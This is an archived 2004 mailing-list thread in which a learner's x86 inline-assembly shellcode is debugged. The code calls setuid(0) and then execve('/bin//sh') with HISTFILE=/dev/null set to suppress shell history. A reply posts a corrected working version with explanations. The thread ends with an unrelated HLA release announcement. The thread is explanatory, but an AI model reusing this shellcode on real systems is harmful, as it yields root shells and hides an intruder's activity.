* execve with env..
@ 2004-05-27 17:23 Danett song
2004-05-27 19:40 ` fmarmond
0 siblings, 1 reply; 7+ messages in thread
From: Danett song @ 2004-05-27 17:23 UTC (permalink / raw)
To: linux-assembly
Hi,
I'm trying code via asm inline a code that will call
setuid the execve() to call /bin/sh but it must pass
as last argument (env) the HISTFILE=/dev/null and then
call exit, i done this code and it run, but i don't
know why it doesn't set the env HISTFILE=/dev/null :(
code:
#include <stdio.h>
int main(){
__asm__(
"xor %eax, %eax \n"
"xor %ebx, %ebx \n"
"mov $0x17, %al \n"
"int $0x80 \n"
"xor %eax,%eax \n"
"push %eax \n"
"push $0x68732F2F \n"
"push $0x6E69622F \n"
"mov %esp,%ebx \n"
"push %eax \n"
"push %ebx \n"
"mov %esp, %ecx \n"
"xor %edx, %edx \n"
"push $0x6C6C756E \n"
"push $0x2F2F7665 \n"
"push $0x642F2F3D \n"
"push $0x454C4946 \n"
"push $0x54534948 \n"
"push %eax \n"
"mov %esp, %edx \n"
"mov $0x0b, %al \n"
"int $0x80 \n"
"xor %eax,%eax \n"
"mov $0x01,%al \n"
"int $0x80 \n"
);
return(0);
}
Someone know what i'm making wrong ?
Thkz.
______________________________________________________________________
Participe da pesquisa global sobre o Yahoo! Mail:
http://br.surveys.yahoo.com/global_mail_survey_br
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: execve with env..
2004-05-27 17:23 execve with env Danett song
@ 2004-05-27 19:40 ` fmarmond
2004-05-27 21:05 ` Danett song
2004-06-05 17:17 ` Assembler Developer's Kit (ADK)/HLA v2.0 Update Randall Hyde
0 siblings, 2 replies; 7+ messages in thread
From: fmarmond @ 2004-05-27 19:40 UTC (permalink / raw)
To: Danett song; +Cc: linux-assembly
I have no time today, but I'll try to help you tomorow.
Can you provide a commented version of your code?
(just the name of the called interrupt's function, the ascii you push on stack
in clear, ...)
It would save me time to translate your hexa into ascii...
What I can say very quickly is:
"Linux ignores the SUID and SGID bits on scripts." (from the execve man page)
Fred
Selon Danett song <danett18@yahoo.com.br>:
> Hi,
>
> I'm trying code via asm inline a code that will call
> setuid the execve() to call /bin/sh but it must pass
> as last argument (env) the HISTFILE=/dev/null and then
> call exit, i done this code and it run, but i don't
> know why it doesn't set the env HISTFILE=/dev/null :(
>
> code:
>
> #include <stdio.h>
>
> int main(){
>
> __asm__(
> "xor %eax, %eax \n"
> "xor %ebx, %ebx \n"
> "mov $0x17, %al \n"
> "int $0x80 \n"
> "xor %eax,%eax \n"
> "push %eax \n"
> "push $0x68732F2F \n"
> "push $0x6E69622F \n"
> "mov %esp,%ebx \n"
> "push %eax \n"
> "push %ebx \n"
> "mov %esp, %ecx \n"
> "xor %edx, %edx \n"
> "push $0x6C6C756E \n"
> "push $0x2F2F7665 \n"
> "push $0x642F2F3D \n"
> "push $0x454C4946 \n"
> "push $0x54534948 \n"
> "push %eax \n"
> "mov %esp, %edx \n"
> "mov $0x0b, %al \n"
> "int $0x80 \n"
> "xor %eax,%eax \n"
> "mov $0x01,%al \n"
> "int $0x80 \n"
>
> );
>
> return(0);
> }
>
> Someone know what i'm making wrong ?
>
> Thkz.
>
>
> ______________________________________________________________________
>
> Participe da pesquisa global sobre o Yahoo! Mail:
> http://br.surveys.yahoo.com/global_mail_survey_br
> -
> To unsubscribe from this list: send the line "unsubscribe linux-assembly" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at http://vger.kernel.org/majordomo-info.html
>
>
-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: execve with env..
2004-05-27 19:40 ` fmarmond
@ 2004-05-27 21:05 ` Danett song
2004-05-28 8:54 ` Frederic Marmond
2004-06-05 17:17 ` Assembler Developer's Kit (ADK)/HLA v2.0 Update Randall Hyde
1 sibling, 1 reply; 7+ messages in thread
From: Danett song @ 2004-05-27 21:05 UTC (permalink / raw)
To: fmarmond; +Cc: linux-assembly
Hi fmarmond,
> I have no time today, but I'll try to help you
> tomorow.
Thkz a lot! :)
> Can you provide a commented version of your code?
Yah, look below...
#include <stdio.h>
int main(){
__asm__(
"xor %eax, %eax \n" // set 0 to %eax
"xor %ebx, %ebx \n" // 1 arg setuid (zero)
"mov $0x17, %al \n" // call setuid
"int $0x80 \n" // kernel mode
"xor %eax,%eax \n" // set 0 to %eax
"push %eax \n" // put zero at stack
"push $0x68732F2F \n"
"push $0x6E69622F \n" // put /bin//bash at
stack
"mov %esp,%ebx \n" // Copy 1arg execve
"push %eax \n" // put zero at stack
"push %ebx \n" // put %ebx at stack
"mov %esp, %ecx \n" // Copy 2arg execve
"xor %edx, %edx \n" // set 0 to %edx
"push $0x6C6C756E \n"
"push $0x2F2F7665 \n"
"push $0x642F2F3D \n"
"push $0x454C4946 \n"
"push $0x54534948 \n" // HISTFILE=//dev//null
"push %eax \n" // put zero at stack
"mov %esp, %edx \n" // copy 3arg execve
"mov $0x0b, %al \n" // call execve
"int $0x80 \n" // kernel mode
"xor %eax,%eax \n" // 1arg of exit (zero)
"mov $0x01,%al \n" // call exit
"int $0x80 \n" // kernel mode
);
return(0);
}
Thkz,
______________________________________________________________________
Participe da pesquisa global sobre o Yahoo! Mail:
http://br.surveys.yahoo.com/global_mail_survey_br
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: execve with env..
2004-05-27 21:05 ` Danett song
@ 2004-05-28 8:54 ` Frederic Marmond
2004-05-31 18:32 ` Danett song
0 siblings, 1 reply; 7+ messages in thread
From: Frederic Marmond @ 2004-05-28 8:54 UTC (permalink / raw)
To: Danett song; +Cc: linux-assembly
Hi Danett,
I finally had time to have a look at your code.
1rst: the translations (heaxa -> ascii) you gave were wrong. If you play
with assembly, you have to be rigourous and well document your code.
2nd : have a look at
http://www.linuxfocus.org/English/March2001/article183.shtml (many
langage translations available), as it may gives you informations about
what you seem to want to do.
3rd: have a look at the code. I've modified some lines (my tag is 'FMD')
FMD~ => I changed this line
FMD+ => I added this line
FMD- => I removed this line
__asm__(
"xor %eax, %eax \n" // set 0 to %eax
"xor %ebx, %ebx \n" // 1 arg setuid (zero)
"mov $0x17, %al \n" // call setuid
"int $0x80 \n" // kernel mode
"xor %eax,%eax \n" // set 0 to %eax
"push %eax \n" // put zero at stack
"push $0x68732F2F \n" // FMD~: hs//
"push $0x6E69622F \n" // FMD~: nib/
// FMD+: FALSE "put /bin//bash at stack"
// FMD+: it is not "bash", but "sh" you
give as parameter.
// FMD+: it's not a problem, but please,
next time, make right comments!
"mov %esp,%ebx \n" // Copy 1arg execve
"push %eax \n" // put zero at stack
"push %ebx \n" // put %ebx at stack
"mov %esp, %ecx \n" // Copy 2arg execve
"xor %edx, %edx \n" // set 0 to %edx
"push %eax \n" //FMD+: you've forgot this line
"push $0x6C6C756E \n" // FMD~: llun
"push $0x2F2F7665 \n" // FMD~: //ve
"push $0x642F2F3D \n" // FMD~: d//=
"push $0x454C4946 \n" // FMD~: ELIF
// "push $0x54534949 \n" // FMD-: TSII
"push $0x54534948 \n" // FMD+: TSIH
// FMD+: FALSE: "HISTFILE=//dev//null"
// FMD+: wrong hexa code, you wrote
"IISTFILE=...", instead of "HISTFILE=..."
"mov %esp, %edx \n" // FMD+: back up the string pointer
"push %eax \n" // put zero at stack
"push %edx \n" // FMD+: put the env string here in stack
"mov %esp, %edx \n" // copy 3arg execve
"mov $0x0b, %al \n" // call execve
"int $0x80 \n" // kernel mode
"xor %eax,%eax \n" // 1arg of exit (zero)
"mov $0x01,%al \n" // call exit
"int $0x80 \n" // kernel mode
);
As you can see, few typo errors in your comments and hexa strings.
But the most important is that you have to pass 3rd argument to execve
exactly as for its 2nd. (char* []).
I hope your intention is not to hack someone else system, and that you
play with that only for learning purpose...
Keep in mind there are always someone (stronger than you and than me)
that may catch you if you pirate something...
If you have another question, feel free to ask! ;)
Fred
Danett song wrote:
>Hi fmarmond,
>
>
>
>>I have no time today, but I'll try to help you
>>tomorow.
>>
>>
>
>Thkz a lot! :)
>
>
>
>>Can you provide a commented version of your code?
>>
>>
>
>Yah, look below...
>
>#include <stdio.h>
>
>int main(){
>
>__asm__(
> "xor %eax, %eax \n" // set 0 to %eax
> "xor %ebx, %ebx \n" // 1 arg setuid (zero)
> "mov $0x17, %al \n" // call setuid
> "int $0x80 \n" // kernel mode
> "xor %eax,%eax \n" // set 0 to %eax
> "push %eax \n" // put zero at stack
> "push $0x68732F2F \n"
> "push $0x6E69622F \n" // put /bin//bash at
>stack
> "mov %esp,%ebx \n" // Copy 1arg execve
> "push %eax \n" // put zero at stack
> "push %ebx \n" // put %ebx at stack
> "mov %esp, %ecx \n" // Copy 2arg execve
> "xor %edx, %edx \n" // set 0 to %edx
> "push $0x6C6C756E \n"
> "push $0x2F2F7665 \n"
> "push $0x642F2F3D \n"
> "push $0x454C4946 \n"
> "push $0x54534948 \n" // HISTFILE=//dev//null
> "push %eax \n" // put zero at stack
> "mov %esp, %edx \n" // copy 3arg execve
> "mov $0x0b, %al \n" // call execve
> "int $0x80 \n" // kernel mode
> "xor %eax,%eax \n" // 1arg of exit (zero)
> "mov $0x01,%al \n" // call exit
> "int $0x80 \n" // kernel mode
> );
>
>return(0);
>}
>
>Thkz,
>
>______________________________________________________________________
>
>Participe da pesquisa global sobre o Yahoo! Mail:
>http://br.surveys.yahoo.com/global_mail_survey_br
>
>
>
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: execve with env..
2004-05-28 8:54 ` Frederic Marmond
@ 2004-05-31 18:32 ` Danett song
2004-06-01 8:29 ` Frederic Marmond
0 siblings, 1 reply; 7+ messages in thread
From: Danett song @ 2004-05-31 18:32 UTC (permalink / raw)
To: fmarmond; +Cc: linux-assembly
Hi Frederic!
1st thkz a lot for your reply.
> 1rst: the translations (heaxa -> ascii) you gave
> were wrong. If you play
> with assembly, you have to be rigourous and well
> document your code.
I will pay more attention at it...
> 2nd : have a look at
>htttp://www.linuxfocus.org/English/March2001/article183.shtml
Wonderful this file!! This Frederic who wrote it, is
you ?
> As you can see, few typo errors in your comments and
> hexa strings.
Yahh, in /bin//sh i really was late to go to school
and wrote wrong.. hehehe
> But the most important is that you have to pass 3rd
> argument to execve
> exactly as for its 2nd. (char* []).
Perfect! With a zero after and a zero before strings..
> I hope your intention is not to hack someone else
> system, and that you
> play with that only for learning purpose...
Yes, only for learning how exploits, overflow,
shellcode works. If i went hack someone i will use the
leeto shellcodes avaible at internet :)
> Keep in mind there are always someone (stronger than
> you and than me)
> that may catch you if you pirate something...
Sure!
> If you have another question, feel free to ask! ;)
Thkz a lot again.
Regards.
______________________________________________________________________
Participe da pesquisa global sobre o Yahoo! Mail:
http://br.surveys.yahoo.com/global_mail_survey_br
^ permalink raw reply [flat|nested] 7+ messages in thread
* Re: execve with env..
2004-05-31 18:32 ` Danett song
@ 2004-06-01 8:29 ` Frederic Marmond
0 siblings, 0 replies; 7+ messages in thread
From: Frederic Marmond @ 2004-06-01 8:29 UTC (permalink / raw)
To: Danett song; +Cc: linux-assembly
Danett song wrote:
>>2nd : have a look at
>>htttp://www.linuxfocus.org/English/March2001/article183.shtml
>>
>>
>
>Wonderful this file!! This Frederic who wrote it, is
>you ?
>
>
>
nope, I just found it with google, when I searched educationnal stuff
for you.
>
>>But the most important is that you have to pass 3rd
>>argument to execve
>>exactly as for its 2nd. (char* []).
>>
>>
>
>Perfect! With a zero after and a zero before strings..
>
>
>
? heu, what do you mean? Are you sure you've all understood about
passing parameters to execve?
execve needs 3 params:
int execve(const char *filename, char *const argv [], char *const
envp[]);
- 1 is a filename (ptr to char , null terminated)
"push %eax \n" // put zero at stack
"push $0x68732F2F \n" // FMD~: hs//
"push $0x6E69622F \n" // FMD~: nib/
"mov %esp,%ebx \n" // Copy 1arg execve
as stack is 'reversed order', the first 'push %eax' (which is
zeroed) is the 'null' that will terminate the string.
the 'mov %esp,%ebx' back up the pointer to the string into %ebx,
which is the 1rst arg for execve system call
- 2 and 3 are null terminated arrays of null terminated strings
the 'null terminated' string (same scheme as above):
"push %eax \n" //FMD+: you've forgot this line
"push $0x6C6C756E \n" // FMD~: llun
"push $0x2F2F7665 \n" // FMD~: //ve
"push $0x642F2F3D \n" // FMD~: d//=
"push $0x454C4946 \n" // FMD~: ELIF
"push $0x54534948 \n" // FMD+: TSIH
back up the pointer of this string
"mov %esp, %edx \n" // FMD+: back up the string pointer
the 'null terminated' array:
last row of the array (null)
"push %eax \n" // put zero at stack
first row of the array (pointer to the string)
"push %edx \n" // FMD+: put the env string here in stack
pointer to the array
"mov %esp, %edx \n" // copy 3arg execve
here, stack only contains strings and and array of pointer to strings.
parameters are passed to execve syscall with ebx, ecx and edx
do you get it?
if a particular point is unclear, just ask about, i'll detail it for you
(i've some free time those days...)
>
>
>>I hope your intention is not to hack someone else
>>system, and that you
>>play with that only for learning purpose...
>>
>>
>
>Yes, only for learning how exploits, overflow,
>shellcode works. If i went hack someone i will use the
>leeto shellcodes avaible at internet :)
>
>
>
I had played with it (pirating) when I was young, but I find it very
much more exiting to create strong security softs rather than pirating
baddly wrote ones.
If you want to be 'well-known', recognized and famous, you'd better try
to improve soft security instead of trying to break them.
And I can tell you there is a lot of fun with that!
>
>
>>If you have another question, feel free to ask! ;)
>>
>>
>
>Thkz a lot again.
>
>
you're welcome!
Fred
>Regards.
>
>______________________________________________________________________
>
>Participe da pesquisa global sobre o Yahoo! Mail:
>http://br.surveys.yahoo.com/global_mail_survey_br
>
>
>
^ permalink raw reply [flat|nested] 7+ messages in thread
* Assembler Developer's Kit (ADK)/HLA v2.0 Update
2004-05-27 19:40 ` fmarmond
2004-05-27 21:05 ` Danett song
@ 2004-06-05 17:17 ` Randall Hyde
1 sibling, 0 replies; 7+ messages in thread
From: Randall Hyde @ 2004-06-05 17:17 UTC (permalink / raw)
To: linux-assembly
Hi All,
I've just uploaded a new version of the HLA v2.0 source code
(also know as the assembler developer's kit) to Webster. The URL is
http://webster.cs.ucr.edu/AsmTools/RollYourOwn/index.html
I've added about 25,000 lines of code in this release. The major
changes are support for most of the HLA compile-time functions,
improved record parsing, and tons of defect corrections.
The complete description appears below.
Cheers,
Randy Hyde
----------------------------------------------------------------------------
--
Hi All,
I've started putting the HLA v2.0 source code on Webster.
Don't get your hopes up, HLA v2.0 is still a *long* ways
away at this point. But by putting the source code up on
Webster I hope to achieve four things:
1. People can watch the progress of HLA v2.0 (or lack thereof),
thus encouraging me to keep working on it
2. Those interested in working on the HLA v2.0 open source
project in the future can start studying the source code today
(I intend to open development to others once I get the compile-time
language and declarations parsing finished).
3. Some people are working on other assemblers and have asked
for bits and pieces of the HLA v2.0 source code (because it is
very high performance).
4. Some people are interested in creating their own HLLs and the
HLA declaration parsing code provides a great head start for such languages.
In any case, you can check out HLA v2.0's progress at the following web
page:
http://webster.cs.ucr.edu/AsmTools/RollYourOwn/index.html
Enjoy!
Randy Hyde
^ permalink raw reply [flat|nested] 7+ messages in thread
end of thread, other threads:[~2004-06-05 17:17 UTC | newest]
Thread overview: 7+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2004-05-27 17:23 execve with env Danett song
2004-05-27 19:40 ` fmarmond
2004-05-27 21:05 ` Danett song
2004-05-28 8:54 ` Frederic Marmond
2004-05-31 18:32 ` Danett song
2004-06-01 8:29 ` Frederic Marmond
2004-06-05 17:17 ` Assembler Developer's Kit (ADK)/HLA v2.0 Update Randall Hyde
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).